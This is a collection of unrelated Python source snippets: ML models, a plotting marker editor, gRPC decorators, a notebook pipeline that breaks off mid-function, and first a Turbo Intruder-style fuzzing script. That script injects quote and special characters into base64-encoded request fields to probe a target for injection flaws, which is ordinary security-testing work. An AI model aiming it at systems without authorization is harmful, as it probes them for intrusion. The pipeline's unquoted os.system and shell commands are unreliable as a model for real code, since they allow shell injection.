id | content
---|---|
29310
|
from haptyc import *
from base64 import b64encode, b64decode
import json
class TestLogic(Transform):
#
# test_h1: Decodes base64, fuzzes using random_insert, Re-encodes base64
# Number of tests: 50
#
@ApplyIteration(50)
def test_h1(self, data, state):
data = b64decode(data)
data = random_insert(data,list("'"))
data = b64encode(data)
return data
#
# test_jsonfuzz: Deserialize JSON
# Loop through every key
# Decodes base64
# fuzzes using random_insert
# Re-encodes base64
# Serialize JSON
# Number of tests: 50
#
@ApplyIteration(50)
def test_jsonfuzz(self, data, state):
JA = json.loads(data)
for key in JA:
JA[key] = b64encode(random_insert(b64decode(JA[key]), list("!@#$%^&*()")))
return json.dumps(JA)
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=1, requestsPerConnection=1, pipeline=0)
TestFactory = TestLogic(target.req)
for test in TestFactory:
engine.queue(test)
def handleResponse(req, interesting):
table.add(req)
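#
# For reference, a hedged sketch (not haptyc's actual helper) of what a
# random_insert-style mutation does: splice one payload character into the
# decoded bytes at a random offset before re-encoding.
#
def _random_insert_sketch(data, chars):
    import random
    pos = random.randint(0, len(data))
    return data[:pos] + random.choice(chars).encode() + data[pos:]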
|
29327
|
import numpy as np
import tensorflow as tf
import tensorflow.contrib.slim as slim
class Generator:
def __init__(self, learning_rate=1e-4, num_blocks=6):
self.learning_rate = learning_rate
self.num_blocks = num_blocks
def pelu(self, x):
with tf.variable_scope(x.op.name + '_activation', initializer=tf.constant_initializer(1.0), reuse=tf.AUTO_REUSE):
shape = x.get_shape().as_list()[1:]
alpha = tf.get_variable('alpha', 1, constraint=lambda t: tf.maximum(t, 0.1))
beta = tf.get_variable('beta', 1, constraint=lambda t: tf.maximum(t, 0.1))
positive = tf.nn.relu(x) * alpha / (beta + 1e-9)
negative = alpha * (tf.exp((-tf.nn.relu(-x)) / (beta + 1e-9)) - 1)
return negative + positive
def adaptive_global_average_pool_2d(self, x):
c = x.get_shape()[-1]
ADAP2d = tf.reshape(tf.reduce_mean(x, axis=[1, 2]), (-1, 1, 1, c))
return ADAP2d
def channel_attention(self, x, f, reduction):
skip_conn = tf.identity(x, name='identity')
x = self.adaptive_global_average_pool_2d(x)
x = tf.layers.conv2d(x, kernel_size=1, filters=f//reduction, strides=1, padding='same')
x = self.pelu(x)
x = tf.layers.conv2d(x, kernel_size=1, filters=f, strides=1, padding='same')
x = tf.nn.sigmoid(x)
CA = tf.multiply(skip_conn, x)
return CA
def ResidualBlock(self, x, kernel_size, filters, strides=1):
x = tf.layers.conv2d(x, kernel_size=1, filters=filters, strides=1, padding='same')
skip = x
x1 = x
for i in range(3):
tm1 = slim.conv2d(x1, num_outputs=filters, kernel_size=[3, 3], stride=1)
tm1 = self.pelu(tm1)
tm1 = slim.conv2d(tm1, num_outputs=filters, kernel_size=[1, 1], stride=1)
tm1 = self.pelu(tm1)
tm1 = slim.conv2d(tm1, num_outputs=filters, kernel_size=[1, 1], stride=1)
tm1 = self.channel_attention(tm1, f=filters, reduction=4)
x1 = tf.concat([x1,tm1], axis=3)
x2 = x
for i in range(3):
tm2 = slim.conv2d(x2, num_outputs=filters, kernel_size=[3, 3], stride=1)
tm2 = self.pelu(tm2)
tm2 = slim.conv2d(tm2, num_outputs=filters, kernel_size=[1, 1], stride=1)
tm2 = self.pelu(tm2)
tm2 = slim.conv2d(tm2, num_outputs=filters, kernel_size=[1, 1], stride=1)
tm2 = self.channel_attention(tm2, f=filters, reduction=4)
x2 = tf.concat([x2,tm2], axis=3)
x3 = x
for i in range(3):
tm3 = slim.conv2d(x3, num_outputs=filters, kernel_size=[3, 3], stride=1)
tm3 = self.pelu(tm3)
tm3 = slim.conv2d(tm3, num_outputs=filters, kernel_size=[1, 1], stride=1)
tm3 = self.pelu(tm3)
tm3 = slim.conv2d(tm3, num_outputs=filters, kernel_size=[1, 1], stride=1)
tm3 = self.channel_attention(tm3, f=filters, reduction=4)
x3 = tf.concat([x3,tm3], axis=3)
x5 = tf.concat(values=[x1, x2, x3], axis=3, name='stack0')
x6 = tf.layers.conv2d(x5, kernel_size=1, filters=filters, strides=strides, padding='same', use_bias=False)
x7 = skip + x6
return x7
def Upsample2xBlock(self, x, kernel_size, filters, strides):
#size = tf.shape(x)
#h = size[1]
#w = size[2]
#x = tf.image.resize_nearest_neighbor(x, size=[h * 3, w * 3], align_corners=False, name=None)
x = tf.layers.conv2d(x, kernel_size=kernel_size, filters=filters, strides=strides, padding='same')
x = tf.depth_to_space(x, 2)
x = self.pelu(x)
return x
def ThermalSR(self, x, reuse=False, isTraining=True):
with tf.variable_scope("ThermalSR", reuse=reuse) as scope:
x4 = tf.layers.conv2d(x, kernel_size=7, filters=64, strides=1, padding='same')
x4 = self.pelu(x4)
skip = x4
# Global Residual Learning
size = tf.shape(x)
h = size[1]
w = size[2]
x_GRL = tf.image.resize_bicubic(x, size=[h * 4, w * 4], align_corners=False, name=None)
x_GRL = tf.layers.conv2d(x_GRL, kernel_size=1, filters=64, strides=1, padding='same')
x_GRL = self.pelu(x_GRL)
x_GRL = tf.layers.conv2d(x_GRL, kernel_size=1, filters=16, strides=1, padding='same')
x_GRL = self.pelu(x_GRL)
x_GRL = tf.layers.conv2d(x_GRL, kernel_size=1, filters=3, strides=1, padding='same')
x_GRL = self.pelu(x_GRL)
for i in range(4):
x4 = self.ResidualBlock(x4, kernel_size=1, filters=64, strides=1)
x4 = tf.layers.conv2d(x4, kernel_size=1, filters=64, strides=1, padding='same', use_bias=False)
x4 = self.pelu(x4)
x4 = tf.concat([x4, skip], axis=3)
x4 = tf.layers.conv2d(x4, kernel_size=3, filters=64, strides=1, padding='same', use_bias=False)
x4 = self.pelu(x4)
x4 = x4 + skip
with tf.variable_scope('Upsamplingconv_stage_1'):
xUP = self.Upsample2xBlock(x4, kernel_size=3, filters=64, strides = 1)
xUP = tf.layers.conv2d(xUP, kernel_size=1, filters=64, strides=1, padding='same', use_bias=False)
xUP = self.pelu(xUP)
skip1 = xUP
for i in range(2):
x5 = self.ResidualBlock(xUP, kernel_size=1, filters=32, strides=1)
x5 = tf.layers.conv2d(x5, kernel_size=1, filters=32, strides=1, padding='same', use_bias=False)
x5 = self.pelu(x5)
x5 = tf.concat([x5, skip1], axis=3)
x5 = tf.layers.conv2d(x5, kernel_size=3, filters=64, strides=1, padding='same', use_bias=False)
x5 = self.pelu(x5)
x5 = x5 + skip1
with tf.variable_scope('Upsamplingconv_stage_2'):
x6 = self.Upsample2xBlock(x5, kernel_size=3, filters=64, strides = 1)
x6 = tf.layers.conv2d(x6, kernel_size=3, filters=64, strides=1, padding='same', name='forward_4')
x6 = self.pelu(x6)
x6 = tf.layers.conv2d(x6, kernel_size=3, filters=3, strides=1, padding='same', name='forward_5')
x6 = self.pelu(x6)
x_final = x6 + x_GRL
return x_final
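# Minimal smoke-test sketch: names and shapes below are illustrative and assume a
# TensorFlow 1.x runtime with tf.contrib available (as imported above).
if __name__ == '__main__':
    lr_images = tf.placeholder(tf.float32, [None, None, None, 3], name='lr_input')
    sr_images = Generator().ThermalSR(lr_images)
    with tf.Session() as sess:
        sess.run(tf.global_variables_initializer())
        out = sess.run(sr_images,
                       feed_dict={lr_images: np.random.rand(1, 32, 32, 3).astype(np.float32)})
        print(out.shape)  # should be (1, 128, 128, 3): two 2x upsample stages plus bicubic GRL = 4x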
|
29329
|
from vcs import vtk_ui
from vcs.colorpicker import ColorPicker
from vcs.vtk_ui import behaviors
from vcs.VCS_validation_functions import checkMarker
import vtk
import vcs.vcs2vtk
from . import priority
import sys
class MarkerEditor(
behaviors.ClickableMixin, behaviors.DraggableMixin, priority.PriorityEditor):
"""
Editor for marker objects
Ctrl + click to drop a new marker, toolbar to configure, priority, draggable + handles on each marker.
"""
def __init__(self, interactor, marker, index, display, configurator):
self.interactor = interactor
self.marker = marker
self.index = index
self.configurator = configurator
actors = display.backend["vtk_backend_marker_actors"][index]
self.glyph, self.glyph_source, self.polydata, self.actor, self.geo = actors
self.display = display
self.handles = []
for ind, x in enumerate(marker.x[index]):
y = marker.y[index][ind]
h = vtk_ui.Handle(
self.interactor, (x, y), dragged=self.adjust, color=(
0, 0, 0), normalize=True)
h.show()
self.handles.append(h)
self.toolbar = vtk_ui.toolbar.Toolbar(
self.interactor,
"Marker Options")
self.toolbar.show()
self.toolbar.add_button(["Change Color"], action=self.change_color)
self.toolbar.add_slider_button(
marker.size[index],
1,
300,
"Marker Size",
update=self.set_size)
self.type_bar = self.toolbar.add_toolbar(
"Marker Type",
open_label="Change")
shapes = marker_shapes()
shapes.insert(0, "Select Shape")
self.shape_button = self.type_bar.add_button(
shapes,
action=self.change_shape)
wmos = wmo_shapes()
wmos.insert(0, "Select WMO Marker")
self.wmo_button = self.type_bar.add_button(
wmos,
action=self.change_wmo)
if self.marker.type[self.index] in shapes:
self.shape_button.set_state(
shapes.index(
self.marker.type[
self.index]))
else:
self.wmo_button.set_state(wmos.index(self.marker.type[self.index]))
# Used to store the color picker when it's active
self.picker = None
prop = vtk.vtkTextProperty()
prop.SetBackgroundColor(.87, .79, .55)
prop.SetBackgroundOpacity(1)
prop.SetColor(0, 0, 0)
self.tooltip = vtk_ui.Label(
self.interactor,
"%s + Click to place new markers." %
("Cmd" if sys.platform == "darwin" else "Ctrl"),
textproperty=prop)
self.tooltip.left = 0
self.tooltip.top = self.interactor.GetRenderWindow(
).GetSize()[1] - self.tooltip.get_dimensions()[1]
self.tooltip.show()
super(MarkerEditor, self).__init__()
self.register()
def get_object(self):
return self.marker
def handle_click(self, point):
x, y = point
# Control drops a new instance
return self.in_bounds(x, y) or self.toolbar.in_toolbar(
x, y) or self.current_modifiers()["control"]
def is_object(self, marker):
return self.marker == marker
def place(self):
for h in self.handles:
h.place()
self.toolbar.place()
def render(self):
from vcs.vtk_ui.manager import get_manager
m = get_manager(self.interactor)
m.queue_render()
def update_shape(self):
# Update the glyph for the marker to reflect the new shape
self.glyph_source, self.polydata = vcs.vcs2vtk.prepGlyph(
self.glyph, self.marker, self.index)
self.display.backend["vtk_backend_marker_actors"][
self.index] = (
self.glyph,
self.glyph_source,
self.polydata,
self.actor,
self.geo)
# Have to rescale the glyph now... work that out later with charles
self.render()
def change_shape(self, index):
if index != 0:
self.marker.type[self.index] = marker_shapes()[index - 1]
self.wmo_button.set_state(0)
self.update_shape()
else:
self.change_wmo(1)
def change_wmo(self, index):
if index != 0:
self.marker.type[self.index] = wmo_shapes()[index - 1]
self.shape_button.set_state(0)
self.update_shape()
else:
self.change_shape(1)
def set_size(self, size):
self.marker.size[self.index] = size
self.update_shape()
def change_color(self, state):
if self.picker:
self.picker.make_current()
else:
self.picker = ColorPicker(
500,
500,
self.marker.colormap,
self.marker.color[
self.index],
parent_interactor=self.interactor,
on_save=self.set_color,
on_cancel=self.cancel_color)
def set_color(self, colormap, color):
self.marker.colormap = colormap
self.marker.color[self.index] = color
del self.picker
self.picker = None
vcs.vcs2vtk.setMarkerColor(
self.actor.GetProperty(),
self.marker,
self.marker.color[
self.index])
self.render()
def cancel_color(self):
del self.picker
self.picker = None
def click_release(self):
x, y = self.event_position()
if self.current_modifiers()["control"]:
h = vtk_ui.Handle(
self.interactor, (x, y), dragged=self.adjust, color=(
0, 0, 0), normalize=True)
h.show()
self.handles.append(h)
self.marker.x[self.index].append(x)
self.marker.y[self.index].append(y)
self.sync_positions()
def adjust(self, handle, dx, dy):
ind = self.handles.index(handle)
self.marker.x[self.index][ind] += dx
self.marker.y[self.index][ind] += dy
self.sync_positions()
def in_bounds(self, x, y):
w, h = self.interactor.GetRenderWindow().GetSize()
return inside_marker(
self.marker, x, y, w, h, index=self.index) is not None
def right_release(self):
x, y = self.event_position()
if self.in_bounds(x, y):
points = list(zip(self.marker.x[self.index], self.marker.y[self.index]))
size = self.marker.size[self.index]
screen_width, screen_height = self.interactor.GetRenderWindow(
).GetSize()
w, h = float(size) / screen_width, float(size) / screen_height
for ind, point in enumerate(points):
m_x, m_y = point
if x > m_x - w and x < m_x + w and y > m_y - h and y < m_y + h:
break
del self.marker.x[self.index][ind]
del self.marker.y[self.index][ind]
self.handles[ind].detach()
del self.handles[ind]
if len(self.marker.x[self.index]) == 0:
del self.marker.x[self.index]
del self.marker.y[self.index]
del self.marker.type[self.index]
del self.marker.color[self.index]
if len(self.marker.x) == 0:
self.delete()
return
self.sync_positions()
def detach(self):
self.unregister()
if self.picker:
self.picker.close()
self.picker = None
self.toolbar.detach()
for h in self.handles:
h.detach()
self.tooltip.detach()
def delete(self):
self.actor.SetVisibility(0)
self.configurator.deactivate(self)
def update_priority(self):
maxLayers = self.interactor.GetRenderWindow().GetNumberOfLayers()
new_layer = self.marker.priority * 10000 + 1 + \
self.configurator.displays.index(self.display)
if new_layer + 1 > maxLayers:
self.interactor.GetRenderWindow().SetNumberOfLayers(new_layer + 1)
self.actor.SetLayerNumber(new_layer)
self.render()
def sync_positions(self):
# Sync all points
points = self.glyph.GetInput().GetPoints()
for i, (x, y) in enumerate(
zip(self.marker.x[self.index], self.marker.y[self.index])):
if i == points.GetNumberOfPoints():
points.InsertNextPoint(x, y, 0)
else:
points.SetPoint(i, x, y, 0)
self.glyph.GetInput().Modified()
self.render()
__shape_cache = {}
def marker_shapes():
# Returns all shapes that are supported (skips star for now), indexed
# numerically
shapes = []
for i in range(1, 20):
if i in __shape_cache:
shapes.append(__shape_cache[i])
else:
try:
val = checkMarker(None, "type", i)
shapes.append(val)
__shape_cache[i] = val
except ValueError:
pass
return shapes
def wmo_shapes():
wmo = []
for i in range(100, 203):
if i in __shape_cache:
wmo.append(__shape_cache[i])
else:
try:
val = checkMarker(None, "type", i)
wmo.append(val)
__shape_cache[i] = val
except ValueError:
pass
return wmo
def inside_marker(marker, x, y, screen_width, screen_height, index=None):
if index is None:
index = list(range(len(marker.x)))
else:
index = [index]
for ind in index:
marker_x, marker_y = marker.x[ind], marker.y[ind]
coords = list(zip(marker_x, marker_y))
size = marker.size[ind]
w, h = float(size) / screen_width, float(size) / screen_height
for m_x, m_y in coords:
if x > m_x - w and x < m_x + w and y > m_y - h and y < m_y + h:
return ind
return None
|
29330
|
from functools import wraps
from typing import Any, Callable, TypeVar, cast
from grpc import Call, RpcError
from grpc.aio import AioRpcError
from .exceptions import AioRequestError, RequestError
from .logging import get_metadata_from_aio_error, get_metadata_from_call, log_error
TFunc = TypeVar("TFunc", bound=Callable[..., Any])
def handle_request_error(name: str):
def decorator(func: TFunc) -> TFunc:
@wraps(func)
def wrapper(*args: Any, **kwargs: Any) -> Any:
try:
return func(*args, **kwargs)
except RpcError as e:
if issubclass(type(e), Call):
metadata = get_metadata_from_call(e)
tracking_id = metadata.tracking_id if metadata else None
log_error(
tracking_id,
name,
f"{e.code().name} {e.details()}", # type:ignore
)
raise RequestError(
e.code(), e.details(), metadata # type:ignore
) from e
raise
return cast(TFunc, wrapper)
return decorator
def handle_request_error_gen(name: str):
def decorator(func: TFunc) -> TFunc:
@wraps(func)
def wrapper(*args: Any, **kwargs: Any) -> Any:
try:
yield from func(*args, **kwargs)
except RpcError as e:
if issubclass(type(e), Call):
metadata = get_metadata_from_call(e)
tracking_id = metadata.tracking_id if metadata else None
log_error(
tracking_id,
name,
f"{e.code().name} {e.details()}", # type:ignore
)
raise RequestError(
e.code(), e.details(), metadata # type:ignore
) from e
raise
return cast(TFunc, wrapper)
return decorator
def handle_aio_request_error(name: str):
def decorator(func: TFunc) -> TFunc:
@wraps(func)
async def wrapper(*args: Any, **kwargs: Any) -> Any:
try:
return await func(*args, **kwargs)
except AioRpcError as e:
metadata = get_metadata_from_aio_error(e)
tracking_id = metadata.tracking_id if metadata else None
log_error(
tracking_id,
name,
f"{e.code().name} {e.details()}", # type:ignore
)
raise AioRequestError(
e.code(), e.details(), metadata # type:ignore
) from e
return cast(TFunc, wrapper)
return decorator
def handle_aio_request_error_gen(name: str):
def decorator(func: TFunc) -> TFunc:
@wraps(func)
async def wrapper(*args: Any, **kwargs: Any) -> Any:
try:
async for result in func(*args, **kwargs):
yield result
except AioRpcError as e:
metadata = get_metadata_from_aio_error(e)
tracking_id = metadata.tracking_id if metadata else None
log_error(
tracking_id,
name,
f"{e.code().name} {e.details()}", # type:ignore
)
raise AioRequestError(
e.code(), e.details(), metadata # type:ignore
) from e
return cast(TFunc, wrapper)
return decorator
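# Hedged usage sketch; the channel, stub, and request classes below are
# hypothetical placeholders, not part of this module:
#
#     channel = grpc.insecure_channel("localhost:50051")
#     stub = WidgetServiceStub(channel)
#
#     @handle_request_error("GetWidget")
#     def get_widget(widget_id: str) -> Any:
#         return stub.GetWidget(GetWidgetRequest(id=widget_id))
#
#     # An RpcError raised by the call is logged with its tracking id (when the
#     # error also implements grpc.Call) and re-raised as RequestError.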
|
29346
|
from spotdl import handle
from spotdl import const
from spotdl import downloader
import os
import sys
const.args = handle.get_arguments(to_group=True)
track = downloader.Downloader(raw_song=const.args.song[0])
track_title = track.refine_songname(track.content.title)
track_filename = track_title + const.args.output_ext
track_download_path = os.path.join(const.args.folder, track_filename)
print(track_filename)
|
29397
|
import torch
from torch.distributions import Uniform
from rl_sandbox.constants import CPU
class UniformPrior:
def __init__(self, low, high, device=torch.device(CPU)):
self.device = device
self.dist = Uniform(low=low, high=high)
def sample(self, num_samples):
return self.dist.rsample(sample_shape=num_samples).to(self.device)
def lprob(self, samples):
return self.dist.log_prob(samples)
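# Hedged usage sketch (assumes this module's imports resolve). Note that
# torch.distributions.Uniform expects sample_shape to be a tuple/torch.Size,
# so a batch of draws is requested as (batch,) rather than a bare int.
if __name__ == "__main__":
    prior = UniformPrior(low=torch.zeros(3), high=torch.ones(3))
    actions = prior.sample(num_samples=(8,))  # shape: (8, 3)
    log_probs = prior.lprob(actions)          # elementwise log-densities, shape (8, 3)
    print(actions.shape, log_probs.shape)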
|
29426
|
def countWord(word):
count = 0
with open('test.txt') as file:
for line in file:
if word in line:
count += line.count(word)
return count
word = input('Enter word: ')
count = countWord(word)
print(word, '- occurrence:', count)
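# A hedged alternative: the loop above counts raw substring hits (so "cat" also
# matches inside "concatenate"); whole-word counting could look like this.
import re
def count_whole_word(word, path='test.txt'):
    pattern = re.compile(r'\b' + re.escape(word) + r'\b')
    with open(path) as file:
        return sum(len(pattern.findall(line)) for line in file)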
|
29439
|
import json
import pickle
import re
from copy import copy, deepcopy
from functools import lru_cache
from json import JSONDecodeError
from os import system, walk, sep
from abc import ABC, abstractmethod
from pathlib import Path
import time
from subprocess import check_output
from tempfile import NamedTemporaryFile
from warnings import warn
from .utils import subset_dict_preserving_order, run_command, nice_time
class no_quotes(str):
def __repr__(self):
original = super().__repr__()
return original[1:-1]
class Rule(ABC):
"""Design principles (or how does it differ from snakemake):
- fully python3; no strange make/python mishmash
- prefer verbosity over ambiguity (named inputs/outputs)
- Jupyter centered
- interactive graphs
- implicit passing of arguments to the executing command
"""
cache_dir: Path
tmp_dir: Path
is_setup = False
rules = {}
def __init__(self, name, **kwargs):
"""Notes:
- input and output will be passed in the same order as it appears in kwargs
- if the input is a dictionary, the keys will be interpreted as argument names;
empty key can be used to insert a positional argument
- the arguments will be serialized preserving the Python type, i.e.
input={'name': 1}
may result in:
--name 1
while:
input={'name': "1"}
would result in
--name "1"
You can force string to be displayed without quotes using:
input={'name': no_quotes("1")}
"""
assert name not in self.rules
self.name = name
self.execution_time = None
self.rules[name] = self
extra_kwargs = set(kwargs) - {'output', 'input', 'group', 'parameters'}
if extra_kwargs:
raise Exception(f'Unrecognized keyword arguments to {self.__class__.__name__}: {extra_kwargs}')
self.arguments = subset_dict_preserving_order(
kwargs,
{'input', 'output', 'parameters'}
)
self.group = kwargs.get('group', None)
self.outputs = {}
self.inputs = {}
self.parameters = {}
if 'output' in kwargs:
output = kwargs['output']
# todo support lists of positionals
self.outputs = output if isinstance(output, dict) else {'': output}
if 'input' in kwargs:
input = kwargs['input']
self.inputs = input if isinstance(input, dict) else {'': input}
if 'parameters' in kwargs:
self.parameters = kwargs['parameters']
@property
def has_inputs(self):
return len(self.inputs) != 0
@property
def has_outputs(self):
return len(self.outputs) != 0
@abstractmethod
def run(self, use_cache: bool) -> int:
if not self.is_setup:
raise ValueError('Please set up the rules class settings with Rule.setup() first!')
@classmethod
def setup(cls, cache_dir: Path, tmp_dir: Path):
cls.cache_dir = Path(cache_dir)
cls.tmp_dir = Path(tmp_dir)
cls.is_setup = True
@abstractmethod
def to_json(self):
pass
def __repr__(self):
fragments = [repr(self.name)]
if self.group:
fragments.append(f'({self.group})')
if self.has_inputs or self.has_outputs:
fragments.append('with')
if self.has_inputs:
fragments.append(f'{len(self.inputs)} inputs')
if self.has_inputs and self.has_outputs:
fragments.append('and')
if self.has_outputs:
fragments.append(f'{len(self.outputs)} outputs')
fragments = ' '.join(fragments)
return f'<{self.__class__.__name__} {fragments}>'
class Group:
"""A group of rules"""
groups = {}
def __init__(self, id: str, name: str, color='#cccccc', parent=None):
assert name not in self.groups
self.name = name
self.id = id
self.color = color
self.groups[id] = self
self.parent = parent
def to_json(self):
return {
'label': self.name,
'id': self.id,
'color': self.color,
'parent': self.parent
}
class ShellRule(Rule):
"""
Named arguments will be passed in order,
preceded with a single dash for single letter names
or a double dash for longer names.
"""
def __init__(self, name, command, **kwargs):
super().__init__(name, **kwargs)
self.command = command
def serialize(self, arguments_group):
if isinstance(arguments_group, dict):
return ' '.join(
(
(
('-' + key if len(key) == 1 else '--' + key)
+
' '
)
if len(key) else
''
) + (
repr(value)
)
for key, value in arguments_group.items()
)
else:
return repr(arguments_group)
@property
def serialized_arguments(self):
# join a generator (not a set) so the argument groups keep their declared order
return ' '.join(
self.serialize(arguments_group)
for arguments_group in self.arguments.values()
)
def run(self, use_cache=False) -> int:
super().run(use_cache)
start_time = time.time()
status = system(f'{self.command} {self.serialized_arguments}')
self.execution_time = time.time() - start_time
return status
def to_json(self):
return {
'name': self.command,
'arguments': self.serialized_arguments,
'execution_time': self.execution_time,
'type': 'shell'
}
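# Hedged usage sketch (file names below are illustrative only):
#
#     Rule.setup(cache_dir='cache', tmp_dir='tmp')
#     rule = ShellRule('sort input', command='sort',
#                      input={'o': no_quotes('sorted.txt'), '': 'unsorted.txt'})
#     rule.serialized_arguments  # -> "-o sorted.txt 'unsorted.txt'"
#     rule.run()                 # runs: sort -o sorted.txt 'unsorted.txt'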
def expand_run_magics(notebook):
out_notebook = copy(notebook)
new_cells = []
for cell in notebook['cells']:
if cell['cell_type'] != 'code':
new_cells.append(cell)
continue
if any(line.startswith('%run') for line in cell['source']):
other_code = []
for line in cell['source']:
if line.startswith('%run'):
if other_code:
split_cell = copy(cell)
split_cell['source'] = other_code
new_cells.append(split_cell)
other_code = []
to_include = line[5:].strip()
with open(to_include) as o:
nb_run = json.load(o)
new_cells.extend(nb_run['cells'])
else:
other_code.append(line)
if other_code:
split_cell = copy(cell)
split_cell['source'] = other_code
new_cells.append(split_cell)
else:
new_cells.append(cell)
out_notebook['cells'] = new_cells
return out_notebook
class NotebookRule(Rule):
options: None
@property
def output_nb_dir(self) -> Path:
return self.tmp_dir / 'out'
@property
def reference_nb_dir(self) -> Path:
return self.tmp_dir / 'ref'
@property
def stripped_nb_dir(self) -> Path:
return self.tmp_dir / 'stripped'
def __init__(
self, *args, notebook,
diff=True,
deduce_io=True,
deduce_io_from_data_vault=True,
execute=True,
**kwargs
):
"""Rule for Jupyter Notebooks
Args:
deduce_io: whether to automatically deduce inputs and outputs from the code cells tagged "inputs" and "outputs";
local variables defined in the cell will be evaluated and used as inputs or outputs.
If you want to generate paths with a helper function for brevity, assign a dict of {variable: path}
to `__inputs__`/`__outputs__` in the tagged cell using `io.create_paths()` helper.
diff: whether to generate diffs against the current state of the notebook
deduce_io_from_data_vault: whether to deduce the inputs and outputs from `data_vault` magics
(`%vault store` and `%vault import`), see https://github.com/krassowski/data-vault
execute: if False, the notebook will not be run; useful to include final "leaf" notebooks
which may take too long to run, but are not essential to the overall results
"""
super().__init__(*args, **kwargs)
self.todos = []
self.notebook = notebook
self.absolute_notebook_path = Path(notebook).absolute()
self.generate_diff = diff
self.diff = None
self.text_diff = None
self.fidelity = None
self.images = []
self.headers = []
self.status = None
self.execute = execute
from datetime import datetime, timedelta
month_ago = (datetime.today() - timedelta(days=30)).timestamp()
self.changes = run_command(f'git rev-list --max-age {month_ago} HEAD --count {self.notebook}')
if deduce_io:
self.deduce_io_from_tags()
if deduce_io_from_data_vault:
self.deduce_io_from_data_vault()
def deduce_io_from_data_vault(self):
notebook_json = self.notebook_json
stored = set()
for index, cell in enumerate(notebook_json['cells']):
if 'source' not in cell:
continue
for line in cell['source']:
if line.startswith('%vault'):
try:
from data_vault import VaultMagics
from data_vault.actions import ImportAction, StoreAction
from data_vault.parsing import split_variables, unquote
except ImportError:
warn('Could not deduce I/O from data-vault %vault magics: data_vault not installed')
return
vault_magics = VaultMagics()
arguments = vault_magics.extract_arguments(line[7:])
action = vault_magics.select_action(arguments)
if isinstance(action, ImportAction):
variables = arguments['import']
for var_index, variable in enumerate(split_variables(variables)):
if 'from' in arguments:
import_path = arguments['from'] + '/' + variable
else:
import_path = unquote(arguments['import'])
if import_path in stored:
warn(f'Skipping {line} which was previously stored from this notebook to avoid cycles')
else:
self.inputs[(index, var_index)] = import_path
elif isinstance(action, StoreAction):
variables = split_variables(arguments['store'])
if 'as' in arguments:
assert len(variables) == 1
variables = [arguments['as']]
for var_index, variable in enumerate(variables):
store_path = arguments['in'] + '/' + variable
self.outputs[(index, var_index)] = store_path
stored.add(store_path)
def deduce_io_from_tags(self, io_tags={'inputs', 'outputs'}):
notebook_json = self.notebook_json
io_cells = {}
for index, cell in enumerate(notebook_json['cells']):
if 'tags' in cell['metadata']:
cell_io_tags = io_tags.intersection(cell['metadata']['tags'])
if cell_io_tags:
assert len(cell_io_tags) == 1
io_cells[list(cell_io_tags)[0]] = cell, index
for io, (cell, index) in io_cells.items():
assert not getattr(self, f'has_{io}')
source = ''.join(cell['source'])
if f'__{io}__' in source:
assert len(cell['outputs']) == 1
# TODO: search through lists
values = cell['outputs'][0]['metadata']
else:
# so we don't want to use eval (we are not within an isolated copy yet!),
# thus only simple regular expression matching which will fail on multi-line strings
# (and anything which is dynamically generated)
assignments = {
match.group('key'): match.group('value')
for match in re.finditer(r'^\s*(?P<key>.*?)\s*=\s*([\'"])(?P<value>.*)\2', source, re.MULTILINE)
}
values = {
key: value
for key, value in assignments.items()
if key.isidentifier() and value
}
if len(assignments) != len(values):
# TODO: add a nicer warning
raise ValueError(f'Could not parse the assignments in the "{io}" cell of {self.notebook}')
setattr(self, io, values)
def serialize(self, arguments_group):
return '-p ' + (' -p '.join(
f'{key} {value}'
for key, value in arguments_group.items()
))
@property
def serialized_arguments(self):
return ' '.join(
self.serialize(arguments_group)
for arguments_group in self.arguments.values()
if arguments_group
)
def outline(self, max_depth=3):
return self.headers
@property
@lru_cache()
def notebook_json(self):
with open(self.absolute_notebook_path) as f:
return expand_run_magics(json.load(f))
def maybe_create_output_dirs(self):
if self.has_outputs:
for name, output in self.outputs.items():
path = Path(output)
path = path.parent
if not path.exists():
print(f'Creating path "{path}" for "{name}" output argument')
path.mkdir(parents=True, exist_ok=True)
def run(self, use_cache=True) -> int:
"""
Run JupyterNotebook using PaperMill and compare the output with reference using nbdime
Returns: status code from the papermill run (0 if successful)
"""
super().run(use_cache)
notebook = self.notebook
path = Path(notebook)
output_nb_dir = self.output_nb_dir / path.parent
output_nb_dir.mkdir(parents=True, exist_ok=True)
reference_nb_dir = self.reference_nb_dir / path.parent
reference_nb_dir.mkdir(parents=True, exist_ok=True)
stripped_nb_dir = self.stripped_nb_dir / path.parent
stripped_nb_dir.mkdir(parents=True, exist_ok=True)
output_nb = output_nb_dir / path.name
reference_nb = reference_nb_dir / path.name
stripped_nb = stripped_nb_dir / path.name
md5 = run_command(f'md5sum {str(self.absolute_notebook_path)}').split()[0]
cache_dir = self.cache_dir / path.parent
cache_dir.mkdir(parents=True, exist_ok=True)
cache_nb_file = cache_dir / f'{md5}.json'
to_cache = ['execution_time', 'fidelity', 'diff', 'text_diff', 'todos', 'headers', 'images']
if use_cache and cache_nb_file.exists():
with open(cache_nb_file, 'rb') as f:
pickled = pickle.load(f)
print(f'Reusing cached results for {self}')
for key in to_cache:
setattr(self, key, pickled[key])
return 0
notebook_json = self.notebook_json
self.images = [
output['data']['image/png']
for cell in notebook_json['cells']
for output in cell.get('outputs', [])
if 'data' in output and 'image/png' in output['data']
]
self.headers = []
for cell in notebook_json['cells']:
if cell['cell_type'] == 'markdown':
for line in cell['source']:
if line.startswith('#'):
self.headers.append(line)
for cell in notebook_json['cells']:
for line in cell.get('source', ''):
if 'TODO' in line:
self.todos.append(line)
# strip outputs (otherwise if it stops, the diff will be too optimistic)
notebook_stripped = deepcopy(notebook_json)
for cell in notebook_stripped['cells']:
cell['outputs'] = []
with open(stripped_nb, 'w') as f:
json.dump(notebook_stripped, f)
if self.execute:
# execute
start_time = time.time()
status = system(f'papermill {stripped_nb} {output_nb} {self.serialized_arguments}') or 0
self.execution_time = time.time() - start_time
else:
status = 0
warn(f'Skipping {self} (execute != True)')
if self.execute and self.generate_diff:
# inject parameters to a "reference" copy (so that we do not have spurious noise in the diff)
system(
f'papermill {self.absolute_notebook_path} {reference_nb} {self.serialized_arguments} --prepare-only'
# do not print "Input Notebook:" and "Output Notebook:" for the second time
' --log-level WARNING'
)
with NamedTemporaryFile(delete=False) as tf:
command = f'nbdiff {reference_nb} {output_nb} --ignore-metadata --ignore-details --out {tf.name}'
result = run_command(command)
with open(tf.name) as f:
try:
self.diff = json.load(f)
except JSONDecodeError as e:
warn(f'Could not load the diff file: {result}, {f.readlines()}')
